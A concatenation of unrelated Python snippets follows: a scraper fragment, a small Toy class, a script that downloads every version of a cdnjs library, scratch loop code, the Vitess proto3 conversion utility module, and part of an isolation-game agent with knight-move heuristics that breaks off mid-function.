if 'entityimgurl' in article:
articleItem['article_imgurl'] = article['entityimgurl']
if 'columnid' in article:
articleItem['column_id'] = article['columnid']
if 'columnname' in article:
articleItem['column_name'] = article['columnname']
if 'publisherid' in article:
articleItem['publisher_id'] = article['publisherid']
if 'publishername' in article:
articleItem['publisher_name'] = article['publishername']
if 'publisheravatarimg' in article:
articleItem['publisher_pic_url'] = article['publisheravatarimg']
if 'columnid' not in article:
articleItem['column_id'] = "unknown"
if 'columnname' not in article:
articleItem['column_name'] = "unknown"
articleItem['update_time'] = time.time()
print('articleItem:', articleItem)
return articleItem # must use return here
|
# assumes the WorldElement class lives in a module of the same name
from WorldElement import WorldElement
class Toy(WorldElement):
def __init__(self, color, shape):
super(Toy, self).__init__(color, shape)
# keep local copies so display() works regardless of how the base class stores them
self.color = color
self.shape = shape
def display(self):
return "Toy of color {0} and shape {1}".format(self.color, self.shape)
|
'''
This program fetches every version of a library that the user requests.
Use the program in the following way:
python3 cdnjsFetch.py ${library name}
After executing it, the program will create a new folder with the name of that library
and place all the files in subfolders named after the version numbers.
'''
import os
import progressbar
import requests
import sys
import json
import urllib.request
if(len(sys.argv) != 2):
print("Parameter Error")
print("Use this program in the following way:\r\n")
print("python3 cdnjsFetch.py ${library name}")
else:
libname = sys.argv[1]
print('Installing library "%s"' %(libname))
bar = progressbar.ProgressBar()
#libname='10up-sanitize.css'
print("Getting lib info through cdnjs API...")
bar.update(0)
get = requests.get('https://api.cdnjs.com/libraries/%s' %(libname))
response = get.text
#print(response)
print("\r\nFinding download URLs...")
bar.update(10)
apidict = json.loads(response)
vnum = len(apidict['assets'])
print("\r\n%s versions of %s found in cdnjs." %(vnum, libname))
bar.update(20)
url_map = {}
verList = []
for ver in range(vnum):
v = apidict['assets'][ver]['version']
verList.append(v)
urlList = []
for fileName in apidict['assets'][ver]['files']:
urlList.append("https://cdnjs.cloudflare.com/ajax/libs/" + libname + "/" + v + "/" + fileName)
url_map[v] = urlList
print(url_map)
bar.update(50)
#print(urlList)
script_dir = os.path.dirname(os.path.abspath(__file__))
print(script_dir)
libs_dir = os.path.join(script_dir, "libs")
if not os.path.exists(libs_dir):
os.mkdir(libs_dir)
lib_dir = os.path.join(libs_dir, libname)
if not os.path.exists(lib_dir):
os.makedirs(lib_dir)
else:
print("A folder named %s already exists in the ./libs folder. Program terminated." %(libname))
exit(2)
# build every path explicitly instead of chaining os.chdir() calls, which broke
# when __file__ resolved to an absolute path
for v in verList:
ver_dir = os.path.join(lib_dir, v)
os.mkdir(ver_dir)
print(ver_dir)
for url in url_map[v]:
name = url[url.rfind("/") + 1:]
print(url)
print(name)
urllib.request.urlretrieve(url, os.path.join(ver_dir, name))
bar.update(100)
|
#from datetime import datetime,timedelta
#creattime = datetime.now()
#a = creattime.strftime('%d/%m/%Y %H:%M:%S')
#print(a)
#a={}
#b = {}
#b['c'] = 0
#a['b']= b
#print(a)
#a = {}
#b = {}
#b ['v'] = 1
#a ['b'] = b
#a ['c'] = 1
#for i in a:
# print(i)
for i in range(10,100):
for j in range(0,9):
print(i)
print(j)
break
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility module for proto3-python conversions.
This module defines the conversion functions from proto3 to python,
and utility methods / classes to convert requests / responses for any
python connector using the proto3 requests / responses.
"""
import datetime
from decimal import Decimal
from vtproto import query_pb2
from vtproto import topodata_pb2
from vtproto import vtgate_pb2
from vtproto import vtrpc_pb2
from vtdb import field_types
from vtdb import keyrange_constants
from vtdb import keyspace
from vtdb import times
from vtdb import vtgate_utils
# conversions is a map of type to the conversion function that needs
# to be used to convert the incoming array of bytes to the
# corresponding native python type.
# If a type doesn't need conversion, it's not in the map.
conversions = {
query_pb2.INT8: int,
query_pb2.UINT8: int,
query_pb2.INT16: int,
query_pb2.UINT16: int,
query_pb2.INT24: int,
query_pb2.UINT24: int,
query_pb2.INT32: int,
query_pb2.UINT32: int,
query_pb2.INT64: int,
query_pb2.UINT64: long,
query_pb2.FLOAT32: float,
query_pb2.FLOAT64: float,
query_pb2.TIMESTAMP: times.DateTimeOrNone,
query_pb2.DATE: times.DateOrNone,
query_pb2.TIME: times.TimeDeltaOrNone,
query_pb2.DATETIME: times.DateTimeOrNone,
query_pb2.YEAR: int,
query_pb2.DECIMAL: Decimal,
# query_pb2.TEXT: no conversion
# query_pb2.BLOB: no conversion
# query_pb2.VARCHAR: no conversion
# query_pb2.VARBINARY: no conversion
# query_pb2.CHAR: no conversion
# query_pb2.BINARY: no conversion
# query_pb2.BIT: no conversion
# query_pb2.ENUM: no conversion
# query_pb2.SET: no conversion
# query_pb2.TUPLE: no conversion
}
# legacy_code_to_code_map maps legacy error codes
# to the new code that matches grpc's canonical error codes.
legacy_code_to_code_map = {
vtrpc_pb2.SUCCESS_LEGACY: vtrpc_pb2.OK,
vtrpc_pb2.CANCELLED_LEGACY: vtrpc_pb2.CANCELED,
vtrpc_pb2.UNKNOWN_ERROR_LEGACY: vtrpc_pb2.UNKNOWN,
vtrpc_pb2.BAD_INPUT_LEGACY: vtrpc_pb2.INVALID_ARGUMENT,
vtrpc_pb2.DEADLINE_EXCEEDED_LEGACY: vtrpc_pb2.DEADLINE_EXCEEDED,
vtrpc_pb2.INTEGRITY_ERROR_LEGACY: vtrpc_pb2.ALREADY_EXISTS,
vtrpc_pb2.PERMISSION_DENIED_LEGACY: vtrpc_pb2.PERMISSION_DENIED,
vtrpc_pb2.RESOURCE_EXHAUSTED_LEGACY: vtrpc_pb2.RESOURCE_EXHAUSTED,
vtrpc_pb2.QUERY_NOT_SERVED_LEGACY: vtrpc_pb2.FAILED_PRECONDITION,
vtrpc_pb2.NOT_IN_TX_LEGACY: vtrpc_pb2.ABORTED,
vtrpc_pb2.INTERNAL_ERROR_LEGACY: vtrpc_pb2.INTERNAL,
vtrpc_pb2.TRANSIENT_ERROR_LEGACY: vtrpc_pb2.UNAVAILABLE,
vtrpc_pb2.UNAUTHENTICATED_LEGACY: vtrpc_pb2.UNAUTHENTICATED,
}
INT_UPPERBOUND_PLUS_ONE = 1<<63
def make_row(row, convs):
"""Builds a python native row from proto3 row, and conversion array.
Args:
row: proto3 query.Row object
convs: conversion function array
Returns:
an array of converted rows.
"""
converted_row = []
offset = 0
for i, l in enumerate(row.lengths):
if l == -1:
converted_row.append(None)
elif convs[i]:
converted_row.append(convs[i](row.values[offset:offset+l]))
offset += l
else:
converted_row.append(row.values[offset:offset+l])
offset += l
return converted_row
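# Example: a query.Row with lengths=[1, -1, 2] and values='142' decodes to
# ['1', None, '42'] when no conversion functions are set for those columns
# (a length of -1 marks a NULL column and consumes no bytes).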
def build_value(v):
"""Build a proto value from any valid input."""
val = query_pb2.Value()
convert_value(v, val)
return val
def convert_value(value, proto_value, allow_lists=False):
"""Convert a variable from python type to proto type+value.
Args:
value: the python value.
proto_value: the proto3 object, needs a type and value field.
allow_lists: allows the use of python lists.
"""
if isinstance(value, bool):
proto_value.type = query_pb2.INT64
proto_value.value = str(int(value))
elif isinstance(value, int):
proto_value.type = query_pb2.INT64
proto_value.value = str(value)
elif isinstance(value, long):
if value < INT_UPPERBOUND_PLUS_ONE:
proto_value.type = query_pb2.INT64
else:
proto_value.type = query_pb2.UINT64
proto_value.value = str(value)
elif isinstance(value, float):
proto_value.type = query_pb2.FLOAT64
proto_value.value = str(value)
elif hasattr(value, '__sql_literal__'):
proto_value.type = query_pb2.VARBINARY
proto_value.value = str(value.__sql_literal__())
elif isinstance(value, datetime.datetime):
proto_value.type = query_pb2.VARBINARY
proto_value.value = times.DateTimeToString(value)
elif isinstance(value, datetime.date):
proto_value.type = query_pb2.VARBINARY
proto_value.value = times.DateToString(value)
elif isinstance(value, str):
proto_value.type = query_pb2.VARBINARY
proto_value.value = value
elif isinstance(value, field_types.NoneType):
proto_value.type = query_pb2.NULL_TYPE
elif allow_lists and isinstance(value, (set, tuple, list)):
# this only works for bind variables, not for entities.
proto_value.type = query_pb2.TUPLE
for v in list(value):
proto_v = proto_value.values.add()
convert_value(v, proto_v)
else:
proto_value.type = query_pb2.VARBINARY
proto_value.value = str(value)
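# Example mappings produced by convert_value (illustrative):
#   True     -> INT64 '1'
#   7        -> INT64 '7'
#   1.5      -> FLOAT64 '1.5'
#   'abc'    -> VARBINARY 'abc'
#   None     -> NULL_TYPE (via field_types.NoneType)
#   [1, 2]   -> TUPLE of INT64 values (only when allow_lists=True)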
def convert_bind_vars(bind_variables, request_bind_variables):
"""Convert binding variables to proto3.
Args:
bind_variables: a map of strings to python native types.
request_bind_variables: the proto3 object to add bind variables to.
"""
if not bind_variables:
return
for key, val in bind_variables.iteritems():
convert_value(val, request_bind_variables[key], allow_lists=True)
def convert_stream_event_statement(statement):
"""Converts encoded rows inside a StreamEvent.Statement to native types.
Args:
statement: the StreamEvent.Statement object.
Returns:
fields: array of names for the primary key columns.
rows: array of tuples for each primary key value.
"""
fields = []
rows = []
if statement.primary_key_fields:
convs = []
for field in statement.primary_key_fields:
fields.append(field.name)
convs.append(conversions.get(field.type))
for r in statement.primary_key_values:
row = tuple(make_row(r, convs))
rows.append(row)
return fields, rows
class Proto3Connection(object):
"""A base class for proto3-based python connectors.
It assumes the derived object will contain a proto3 self.session object.
"""
def __init__(self):
self._effective_caller_id = None
self.event_token = None
self.fresher = None
def _add_caller_id(self, request, caller_id):
"""Adds the vtgate_client.CallerID to the proto3 request, if any.
Args:
request: proto3 request (any of the {,stream,batch} execute queries).
caller_id: vtgate_client.CallerID object.
"""
if caller_id:
if caller_id.principal:
request.caller_id.principal = caller_id.principal
if caller_id.component:
request.caller_id.component = caller_id.component
if caller_id.subcomponent:
request.caller_id.subcomponent = caller_id.subcomponent
def _add_session(self, request):
"""Adds self.session to the request, if any.
Args:
request: the proto3 request to add session to.
"""
if self.session:
request.session.CopyFrom(self.session)
def update_session(self, response):
"""Updates the current session from the response, if it has one.
Args:
response: a proto3 response that may contain a session object.
"""
if response.HasField('session') and response.session:
self.session = response.session
def _convert_entity_ids(self, entity_keyspace_ids, request_eki):
"""Convert external entity id map to ProtoBuffer.
Args:
entity_keyspace_ids: map of entity_keyspace_id.
request_eki: destination proto3 list.
"""
for xid, kid in entity_keyspace_ids.iteritems():
eid = request_eki.add()
eid.keyspace_id = kid
convert_value(xid, eid, allow_lists=False)
def _add_key_ranges(self, request, key_ranges):
"""Adds the provided keyrange.KeyRange objects to the proto3 request.
Args:
request: proto3 request.
key_ranges: list of keyrange.KeyRange objects.
"""
for kr in key_ranges:
encoded_kr = request.key_ranges.add()
encoded_kr.start = kr.Start
encoded_kr.end = kr.End
def _extract_rpc_error(self, exec_method, error):
"""Raises a VitessError for a proto3 vtrpc.RPCError structure, if set.
Args:
exec_method: name of the method to use in VitessError.
error: vtrpc.RPCError structure.
Raises:
vtgate_utils.VitessError: if an error was set.
"""
if error.code:
raise vtgate_utils.VitessError(exec_method, error.code, error.message)
elif error.legacy_code:
raise vtgate_utils.VitessError(
exec_method,
legacy_code_to_code_map[error.legacy_code],
error.message)
def build_conversions(self, qr_fields):
"""Builds an array of fields and conversions from a result fields.
Args:
qr_fields: query result fields
Returns:
fields: array of fields
convs: conversions to use.
"""
fields = []
convs = []
for field in qr_fields:
fields.append((field.name, field.type))
convs.append(conversions.get(field.type))
return fields, convs
def _get_rowset_from_query_result(self, query_result):
"""Builds a python rowset from proto3 response.
Args:
query_result: proto3 query.QueryResult object.
Returns:
Array of rows
Number of modified rows
Last insert ID
Fields array of (name, type) tuples.
"""
if not query_result:
return [], 0, 0, []
fields, convs = self.build_conversions(query_result.fields)
results = []
for row in query_result.rows:
results.append(tuple(make_row(row, convs)))
rowcount = query_result.rows_affected
lastrowid = query_result.insert_id
return results, rowcount, lastrowid, fields
def begin_request(self, effective_caller_id, single_db):
"""Builds a vtgate_pb2.BeginRequest object.
Also remembers the effective caller id for next call to
commit_request or rollback_request.
Args:
effective_caller_id: optional vtgate_client.CallerID.
single_db: True if single db transaction is needed.
Returns:
A vtgate_pb2.BeginRequest object.
"""
request = vtgate_pb2.BeginRequest()
request.single_db = single_db
self._add_caller_id(request, effective_caller_id)
self._effective_caller_id = effective_caller_id
return request
def commit_request(self, twopc):
"""Builds a vtgate_pb2.CommitRequest object.
Uses the effective_caller_id saved from begin_request().
It will also clear the saved effective_caller_id.
Args:
twopc: perform 2-phase commit.
Returns:
A vtgate_pb2.CommitRequest object.
"""
request = vtgate_pb2.CommitRequest()
request.atomic = twopc
self._add_caller_id(request, self._effective_caller_id)
self._add_session(request)
self._effective_caller_id = None
return request
def rollback_request(self):
"""Builds a vtgate_pb2.RollbackRequest object.
Uses the effective_caller_id saved from begin_request().
It will also clear the saved effective_caller_id.
Returns:
A vtgate_pb2.RollbackRequest object.
"""
request = vtgate_pb2.RollbackRequest()
self._add_caller_id(request, self._effective_caller_id)
self._add_session(request)
self._effective_caller_id = None
return request
def execute_request_and_name(self, sql, bind_variables, tablet_type,
keyspace_name,
shards,
keyspace_ids,
key_ranges,
entity_column_name, entity_keyspace_id_map,
not_in_transaction, effective_caller_id,
include_event_token, compare_event_token):
"""Builds the right vtgate_pb2 Request and method for an _execute call.
Args:
sql: the query to run. Bind Variables in there should be in python format.
bind_variables: python map of bind variables.
tablet_type: string tablet type.
keyspace_name: keyspace to apply the query to.
shards: array of strings representing the shards.
keyspace_ids: array of keyspace ids.
key_ranges: array of keyrange.KeyRange objects.
entity_column_name: the column name to vary.
entity_keyspace_id_map: map of external id to keyspace id.
not_in_transaction: do not create a transaction to a new shard.
effective_caller_id: optional vtgate_client.CallerID.
include_event_token: boolean on whether to ask for event token.
compare_event_token: set the result extras fresher based on this token.
Returns:
A vtgate_pb2.XXXRequest object.
A dict that contains the routing parameters.
The name of the remote method called.
"""
if shards is not None:
request = vtgate_pb2.ExecuteShardsRequest(keyspace=keyspace_name)
request.shards.extend(shards)
routing_kwargs = {'shards': shards}
method_name = 'ExecuteShards'
elif keyspace_ids is not None:
request = vtgate_pb2.ExecuteKeyspaceIdsRequest(keyspace=keyspace_name)
request.keyspace_ids.extend(keyspace_ids)
routing_kwargs = {'keyspace_ids': keyspace_ids}
method_name = 'ExecuteKeyspaceIds'
elif key_ranges is not None:
request = vtgate_pb2.ExecuteKeyRangesRequest(keyspace=keyspace_name)
self._add_key_ranges(request, key_ranges)
routing_kwargs = {'keyranges': key_ranges}
method_name = 'ExecuteKeyRanges'
elif entity_keyspace_id_map is not None:
request = vtgate_pb2.ExecuteEntityIdsRequest(
keyspace=keyspace_name,
entity_column_name=entity_column_name)
self._convert_entity_ids(entity_keyspace_id_map,
request.entity_keyspace_ids)
routing_kwargs = {'entity_keyspace_id_map': entity_keyspace_id_map,
'entity_column_name': entity_column_name}
method_name = 'ExecuteEntityIds'
else:
request = vtgate_pb2.ExecuteRequest()
if keyspace_name:
request.keyspace_shard = keyspace_name
routing_kwargs = {}
method_name = 'Execute'
request.query.sql = sql
convert_bind_vars(bind_variables, request.query.bind_variables)
request.tablet_type = topodata_pb2.TabletType.Value(tablet_type.upper())
request.not_in_transaction = not_in_transaction
self._add_caller_id(request, effective_caller_id)
self._add_session(request)
if include_event_token:
request.options.include_event_token = True
if compare_event_token:
request.options.compare_event_token.CopyFrom(compare_event_token)
self.event_token = None
self.fresher = None
return request, routing_kwargs, method_name
def process_execute_response(self, exec_method, response):
"""Processes an Execute* response, and returns the rowset.
Args:
exec_method: name of the method called.
response: proto3 response returned.
Returns:
results: list of rows.
rowcount: how many rows were affected.
lastrowid: auto-increment value for the last row inserted.
fields: describes the field names and types.
"""
self.update_session(response)
self._extract_rpc_error(exec_method, response.error)
if response.result.extras:
self.event_token = response.result.extras.event_token
self.fresher = response.result.extras.fresher
return self._get_rowset_from_query_result(response.result)
def execute_batch_request_and_name(self, sql_list, bind_variables_list,
keyspace_list,
keyspace_ids_list, shards_list,
tablet_type, as_transaction,
effective_caller_id):
"""Builds the right vtgate_pb2 ExecuteBatch query.
Args:
sql_list: list of SQL statements.
bind_variables_list: list of bind variables.
keyspace_list: list of keyspaces.
keyspace_ids_list: list of list of keyspace_ids.
shards_list: list of shards.
tablet_type: target tablet type.
as_transaction: execute all statements in a single transaction.
effective_caller_id: optional vtgate_client.CallerID.
Returns:
A proper vtgate_pb2.ExecuteBatchXXX object.
The name of the remote method to call.
"""
if keyspace_ids_list and keyspace_ids_list[0]:
request = vtgate_pb2.ExecuteBatchKeyspaceIdsRequest()
for sql, bind_variables, keyspace_name, keyspace_ids in zip(
sql_list, bind_variables_list, keyspace_list, keyspace_ids_list):
query = request.queries.add(keyspace=keyspace_name)
query.query.sql = sql
convert_bind_vars(bind_variables, query.query.bind_variables)
query.keyspace_ids.extend(keyspace_ids)
method_name = 'ExecuteBatchKeyspaceIds'
else:
request = vtgate_pb2.ExecuteBatchShardsRequest()
for sql, bind_variables, keyspace_name, shards in zip(
sql_list, bind_variables_list, keyspace_list, shards_list):
query = request.queries.add(keyspace=keyspace_name)
query.query.sql = sql
convert_bind_vars(bind_variables, query.query.bind_variables)
query.shards.extend(shards)
method_name = 'ExecuteBatchShards'
request.tablet_type = topodata_pb2.TabletType.Value(tablet_type.upper())
request.as_transaction = as_transaction
self._add_caller_id(request, effective_caller_id)
self._add_session(request)
return request, method_name
def process_execute_batch_response(self, exec_method, response):
"""Processes an ExecuteBatch* response, and returns the rowsets.
Args:
exec_method: name of the method called.
response: proto3 response returned.
Returns:
rowsets: array of tuples as would be returned by an execute method.
"""
self.update_session(response)
self._extract_rpc_error(exec_method, response.error)
rowsets = []
for result in response.results:
rowset = self._get_rowset_from_query_result(result)
rowsets.append(rowset)
return rowsets
def update_stream_request(self,
keyspace_name,
shard,
key_range,
tablet_type,
timestamp,
event,
effective_caller_id):
"""Builds the right vtgate_pb2 UpdateStreamRequest.
Args:
keyspace_name: keyspace to apply the query to.
shard: shard to ask for.
key_range: keyrange.KeyRange object.
tablet_type: string tablet type.
timestamp: when to start the stream from.
event: alternate way to describe where to start the stream from.
effective_caller_id: optional vtgate_client.CallerID.
Returns:
A vtgate_pb2.UpdateStreamRequest object.
"""
request = vtgate_pb2.UpdateStreamRequest(keyspace=keyspace_name,
tablet_type=tablet_type,
shard=shard)
if timestamp:
request.timestamp = timestamp
if event:
if event.timestamp:
request.event.timestamp = event.timestamp
if event.shard:
request.event.shard = event.shard
if event.position:
request.event.position = event.position
if key_range:
request.key_range.start = key_range.Start
request.key_range.end = key_range.End
self._add_caller_id(request, effective_caller_id)
return request
def message_stream_request(self,
keyspace_name,
shard,
key_range,
name,
effective_caller_id):
"""Builds the right vtgate_pb2 MessageStreamRequest.
Args:
keyspace_name: keyspace to apply the query to.
shard: shard to ask for.
key_range: keyrange.KeyRange object.
name: message table name.
effective_caller_id: optional vtgate_client.CallerID.
Returns:
A vtgate_pb2.MessageStreamRequest object.
"""
request = vtgate_pb2.MessageStreamRequest(keyspace=keyspace_name,
name=name,
shard=shard)
if key_range:
request.key_range.start = key_range.Start
request.key_range.end = key_range.End
self._add_caller_id(request, effective_caller_id)
return request
def message_ack_request(self,
keyspace_name,
name,
ids,
effective_caller_id):
"""Builds the right vtgate_pb2 MessageAckRequest.
Args:
keyspace_name: keyspace to apply the query to.
name: message table name.
ids: list of message ids.
effective_caller_id: optional vtgate_client.CallerID.
Returns:
A vtgate_pb2.MessageAckRequest object.
"""
vals = []
for v in ids:
vals.append(build_value(v))
request = vtgate_pb2.MessageAckRequest(keyspace=keyspace_name,
name=name,
ids=vals)
self._add_caller_id(request, effective_caller_id)
return request
def stream_execute_request_and_name(self, sql, bind_variables, tablet_type,
keyspace_name,
shards,
keyspace_ids,
key_ranges,
effective_caller_id):
"""Builds the right vtgate_pb2 Request and method for a _stream_execute.
Args:
sql: the query to run. Bind Variables in there should be in python format.
bind_variables: python map of bind variables.
tablet_type: string tablet type.
keyspace_name: keyspace to apply the query to.
shards: array of strings representing the shards.
keyspace_ids: array of keyspace ids.
key_ranges: array of keyrange.KeyRange objects.
effective_caller_id: optional vtgate_client.CallerID.
Returns:
A vtgate_pb2.StreamExecuteXXXXRequest object.
A dict that contains the routing parameters.
The name of the remote method called.
"""
if shards is not None:
request = vtgate_pb2.StreamExecuteShardsRequest(keyspace=keyspace_name)
request.shards.extend(shards)
routing_kwargs = {'shards': shards}
method_name = 'StreamExecuteShards'
elif keyspace_ids is not None:
request = vtgate_pb2.StreamExecuteKeyspaceIdsRequest(
keyspace=keyspace_name)
request.keyspace_ids.extend(keyspace_ids)
routing_kwargs = {'keyspace_ids': keyspace_ids}
method_name = 'StreamExecuteKeyspaceIds'
elif key_ranges is not None:
request = vtgate_pb2.StreamExecuteKeyRangesRequest(keyspace=keyspace_name)
self._add_key_ranges(request, key_ranges)
routing_kwargs = {'keyranges': key_ranges}
method_name = 'StreamExecuteKeyRanges'
else:
request = vtgate_pb2.StreamExecuteRequest()
if keyspace_name:
request.keyspace_shard = keyspace_name
routing_kwargs = {}
method_name = 'StreamExecute'
request.query.sql = sql
convert_bind_vars(bind_variables, request.query.bind_variables)
request.tablet_type = topodata_pb2.TabletType.Value(tablet_type.upper())
self._add_caller_id(request, effective_caller_id)
return request, routing_kwargs, method_name
def srv_keyspace_proto3_to_old(self, sk):
"""Converts a proto3 SrvKeyspace.
Args:
sk: proto3 SrvKeyspace.
Returns:
dict with converted values.
"""
result = {}
if sk.sharding_column_name:
result['ShardingColumnName'] = sk.sharding_column_name
if sk.sharding_column_type == 1:
result['ShardingColumnType'] = keyrange_constants.KIT_UINT64
elif sk.sharding_column_type == 2:
result['ShardingColumnType'] = keyrange_constants.KIT_BYTES
sfmap = {}
for sf in sk.served_from:
tt = keyrange_constants.PROTO3_TABLET_TYPE_TO_STRING[sf.tablet_type]
sfmap[tt] = sf.keyspace
result['ServedFrom'] = sfmap
if sk.partitions:
pmap = {}
for p in sk.partitions:
tt = keyrange_constants.PROTO3_TABLET_TYPE_TO_STRING[p.served_type]
srs = []
for sr in p.shard_references:
result_sr = {
'Name': sr.name,
}
if sr.key_range:
result_sr['KeyRange'] = {
'Start': sr.key_range.start,
'End': sr.key_range.end,
}
srs.append(result_sr)
pmap[tt] = {
'ShardReferences': srs,
}
result['Partitions'] = pmap
return result
def keyspace_from_response(self, name, response):
"""Builds a Keyspace object from the response of a GetSrvKeyspace call.
Args:
name: keyspace name.
response: a GetSrvKeyspaceResponse object.
Returns:
A keyspace.Keyspace object.
"""
return keyspace.Keyspace(
name,
self.srv_keyspace_proto3_to_old(response.srv_keyspace))
|
"""Finish all TODO items in this file to complete the isolation project, then
test your agent's strength against a set of known agents using tournament.py
and include the results in your report.
"""
import random
directions = [(-2, -1), (-2, 1), (-1, -2), (-1, 2),
(1, -2), (1, 2), (2, -1), (2, 1)]
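# the eight (row, column) offsets of a legal knight move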
class SearchTimeout(Exception):
"""Subclass base exception for code clarity. """
pass
def get_moving_area_for_player(game, player):
"""
Parameters
----------
game : `isolation.Board`
player : CustomPlayer
Returns
-------
(int,set)
* distance from border to initial location
* the area that this player reach
"""
remaining = set(game.get_blank_spaces())
player_location = game.get_player_location(player)
next = set([player_location])
search_space = set()
# We may not be able to go through all locations, let's narrow the search space
has_move = True
border = 0
while has_move:
has_move = False
current_round = next
next = set()
for starting_position in current_round:
for direction in directions:
next_position = (starting_position[0] + direction[0], starting_position[1] + direction[1])
if next_position in remaining:
remaining.remove(next_position)
next.add(next_position)
search_space.add(next_position)
has_move = True
if has_move:
border += 1
return border, search_space
def get_max_step_for_player(game, player):
"""
Because a knight's movement follows a bipartite graph, we find the 2 sub-graphs and assign positions to them. The
maximum number of moves is limited to 2x the size of the smaller set, plus a bonus step if there are more positions
in the even set.
http://mathworld.wolfram.com/KnightGraph.html
Parameters
----------
game
player
Returns
-------
(int,set)
upper limit of number of steps we can take
"""
remaining = set(game.get_blank_spaces())
player_location = game.get_player_location(player)
next = set([player_location])
moving_area = set()
# We may not be able to go through all locations, let's narrow the search space
has_move = True
odd_steps = 0
even_steps = 0
is_odd_step = True
while has_move:
has_move = False
current_round = next
next = set()
for starting_position in current_round:
for direction in directions:
next_position = (starting_position[0] + direction[0], starting_position[1] + direction[1])
if next_position in remaining:
remaining.remove(next_position)
next.add(next_position)
moving_area.add(next_position)
if is_odd_step:
odd_steps += 1
else:
even_steps += 1
has_move = True
#each BFS layer lands on the opposite colour class of the knight graph, so flip the parity after every layer
is_odd_step = not is_odd_step
max_steps = min(odd_steps, even_steps)
# Bonus step
if even_steps > odd_steps:
max_steps += 1
return max_steps, moving_area
def real_steps_score(game, player):
"""
Heuristic based on the difference between number of steps that each player can take
Parameters
----------
game : `isolation.Board`
player
Returns
-------
float
difference between the players' estimated maximum numbers of steps (+/- inf on a detected win/loss)
"""
if game.is_winner(player):
return float('inf')
elif game.is_loser(player):
return float('-inf')
opponent = game.get_opponent(player)
max_p_steps, area = get_max_step_for_player(game, player)
max_o_steps, o_area = get_max_step_for_player(game, opponent)
score = max_p_steps - max_o_steps
# If it's player's turn, deduct 0.5 point for the disadvantage
if game.active_player == player:
score -= 0.5
# If there is a partition (the two reachable areas are disjoint), search for end game
if not area.intersection(o_area):
# To do: a proper end-game search
if max_p_steps > max_o_steps:
return float('inf')
elif max_p_steps < max_o_steps:
return float('-inf')
return score
def combined_score(game, player):
"""
Combine the improved_score with real_steps_score after N moves
Parameters
----------
game: `isolation.Board`
player
Returns
-------
float
"""
# Let's be a bit greedy during first half of the game
if game.move_count < (game.width + game.height / 2):
return improved_score(game, player) * 5
# Decision time
return real_steps_score(game, player)
def moving_area_score(game, player):
"""
Scoring heuristic based on the difference between the players' available moving area/space
Parameters
----------
game: `isolation.Board`
player: CustomPlayer
Returns
-------
float
difference in number of possible steps
"""
if game.is_winner(player):
return float('inf')
elif game.is_loser(player):
return float('-inf')
opponent = game.get_opponent(player)
player_step, possibilities = get_moving_area_for_player(game, player)
opponent_step, opp_possibilities = get_moving_area_for_player(game, opponent)
return float(player_step * len(possibilities) - opponent_step * len(opp_possibilities))
def improved_score(game, player):
"""The "Improved" evaluation function discussed in lecture that outputs a
score equal to the difference in the number of moves available to the
two players.
Parameters
----------
game : `isolation.Board`
An instance of `isolation.Board` encoding the current state of the
game (e.g., player locations and blocked cells).
player : hashable
One of the objects registered by the game object as a valid player.
(i.e., `player` should be either game.__player_1__ or
game.__player_2__).
Returns
----------
float
The heuristic value of the current game state
"""
if game.is_loser(player):
return float("-inf")
if game.is_winner(player):
return float("inf")
own_moves = len(game.get_legal_moves(player))
opp_moves = len(game.get_legal_moves(game.get_opponent(player)))
return float(own_moves - opp_moves)
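# Example: if the player has 5 legal moves and the opponent has 3, improved_score returns 2.0.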
def get_moves_from_position(available_squares, position):
"""
Find the available moves from `position`
Parameters
----------
available_squares: set
position: (int,int)
Returns
-------
set of (int,int)
moves from specified position among the set
"""
moves = set()
for direction in directions:
next_move = (position[0] + direction[0], position[1] + direction[1])
if next_move in available_squares:
moves.add(next_move)
return moves
def knight_heuristic(game, start_position):
"""
Estimate the longest path that a knight can take by always moving along the most constrained path (fewest options one step ahead).
This function is used in the knight_only_score heuristic.
Parameters
----------
game: `isolation.Board`
start_position: (int,int)
Returns
-------
int
estimated longest path for a knight
"""
if start_position == (-1, -1):
return 0
search_space = set(game.get_blank_spaces())
longest_path = 0
current_position = start_position
next_move = start_position
current_move_set = get_moves_from_position(search_space, current_position)
next_move_set = set()
while True:
# print('Loop, current position is {}'.format(current_position))
# Because we can move from current position
longest_path += 1
# Identify the candidate move whose onward move set is the most restricted (Warnsdorff-style)
current_choice = 9
for move in current_move_set:
this_move_set = get_moves_from_position(search_space, move)
# Keep the move with the fewest onward options
if len(this_move_set) < current_choice:
# print('Replacing {} with {}'.format(next_move_set, this_move_set))
# print('Next move is set to {}'.format(move))
# print('Because {} < {}'.format(len(this_move_set), current_choice))
next_move_set = this_move_set
next_move = move
current_choice = len(this_move_set)
# Make the move
if current_choice < 9:
search_space.remove(next_move)
current_move_set = next_move_set
current_position = next_move
else:
break
return longest_path
def game_is_partitioned(game):
"""
Detect whether the game board is partitioned.
Parameters
----------
game: `isolation.Board`
Returns
-------
bool
True if the game board is partitioned, False otherwise
"""
_, area1 = get_moving_area_for_player(game, game.active_player)
_, area2 = get_moving_area_for_player(game, game.inactive_player)
# the board is partitioned when the two reachable areas no longer overlap
return len(area1.intersection(area2)) == 0
def knight_only_score(game, player):
"""
Knight's movement heuristic, with fallback to deep search when partitioning is detected.
Parameters
----------
game: `isolation.Board`
player
Returns
-------
float
game score from current player's perspective
"""
if game.is_loser(player):
return float("-inf")
if game.is_winner(player):
return float("inf")
if game_is_partitioned(game):
my_score = knight_heuristic(game, game.get_player_location(player))
opp_score = knight_heuristic(game, game.get_player_location(game.get_opponent(player)))
if my_score > opp_score:
return float('inf')
else:
return float('-inf')
else:
own_moves = len(game.get_legal_moves(player))
opp_moves = len(game.get_legal_moves(game.get_opponent(player)))
return float(own_moves - opp_moves)
def meta_score(ratio):
return lambda game, player: smart_score(game, player, ratio)
def smart_score(game, player, ratio=1):
"""
Experimental heuristic that runs a heuristic only after ratio*N steps, to be called via meta_score.
This function is intended for experimentation only and should be disregarded in the final submission/evaluation.
Parameters
----------
game: `isolation.Board`
player
Returns
-------
float
score from the perspective of `player`
"""
if game.is_loser(player):
return float("-inf")
if game.is_winner(player):
return float("inf")
if (game.move_count > min(game.width, game.height) * 2) and game_is_partitioned(game):
my_score = knight_heuristic(game, game.get_player_location(player))
